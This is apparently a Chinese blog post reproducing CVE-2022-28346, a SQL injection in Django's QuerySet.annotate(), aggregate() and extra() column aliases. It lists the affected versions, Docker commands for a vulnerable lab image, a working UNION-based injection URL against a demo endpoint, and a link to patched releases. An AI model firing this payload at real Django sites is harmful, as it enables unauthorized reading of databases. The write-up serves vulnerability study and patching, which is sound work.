当前位置:网站首页>CVE-2022-28346:Django SQL注入漏洞
CVE-2022-28346:Django SQL注入漏洞
2022-07-07 22:52:00 【yggcwhat】
0x01 简介
Django 是用 Python 开发的一个免费开源的 Web 框架,几乎囊括了 Web 应用的方方面面,可以用于快速搭建高性能、优雅的网站,Django 提供了许多网站后台开发经常用到的模块,使开发者能够专注于业务部分。
0x02 漏洞概述
漏洞编号:CVE-2022-28346
攻击者使用精心编制的字典, 通过**kwargs传递给QuerySet.annotate()、aggregate()和extra()这些方法,可导致这些方法在列别名中受到SQL注入攻击。
0x03 影响版本
4.0 <= Django < 4.0.4
3.2 <= Django < 3.2.13
2.2 <= Django < 2.2.28
0x04 环境搭建
docker pull s0cke3t/cve-2022-28346:latest
docker run -d -p 8080:8000 s0cke3t/cve-2022-28346
0x05 漏洞复现
通过报错页面可以发现存在哪些接口
访问接口如果存在传参,同样会提示报错信息
使用报错提示的参数进行sql注入
http://x.x.x.x:8000/demo?field=demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" --
0x06 修复方式
官方已发布安全版本,下载地址:
https://www.djangoproject.com/download/
边栏推荐
- 第一讲:链表中环的入口结点
- 52岁的周鸿祎,还年轻吗?
- Langchao Yunxi distributed database tracing (II) -- source code analysis
- 【obs】官方是配置USE_GPU_PRIORITY 效果为TRUE的
- 应用实践 | 数仓体系效率全面提升!同程数科基于 Apache Doris 的数据仓库建设
- C language 005: common examples
- 语义分割模型库segmentation_models_pytorch的详细使用介绍
- 如果在构造函数中抛出异常,最好的做法是防止内存泄漏?
- The underlying principles and templates of new and delete
- How can CSDN indent the first line of a paragraph by 2 characters?
猜你喜欢
Stm32f1 and stm32cubeide programming example - rotary encoder drive
搭建ADG过程中复制报错 RMAN-03009 ORA-03113
paddle一个由三个卷积层组成的网络完成cifar10数据集的图像分类任务
Reentrantlock fair lock source code Chapter 0
Trust orbtk development issues 2022
SQL knowledge summary 004: Postgres terminal command summary
DNS 系列(一):为什么更新了 DNS 记录不生效?
C # generics and performance comparison
What has happened from server to cloud hosting?
【测试面试题】页面很卡的原因分析及解决方案
随机推荐
52岁的周鸿祎,还年轻吗?
搭建ADG过程中复制报错 RMAN-03009 ORA-03113
Vscode software
单机高并发模型设计
Operating system principle --- summary of interview knowledge points
[basis of recommendation system] sampling and construction of positive and negative samples
攻防世界Web进阶区unserialize3题解
德总理称乌不会获得“北约式”安全保障
Application practice | the efficiency of the data warehouse system has been comprehensively improved! Data warehouse construction based on Apache Doris in Tongcheng digital Department
5g NR system messages
5G NR 系统消息
浪潮云溪分布式数据库 Tracing(二)—— 源码解析
Scrapy framework
深潜Kotlin协程(二十三 完结篇):SharedFlow 和 StateFlow
某马旅游网站开发(登录注册退出功能的实现)
韦东山第三期课程内容概要
接口测试要测试什么?
Experience of autumn recruitment in 22 years
Codeforces Round #804 (Div. 2)(A~D)
ABAP ALV LVC模板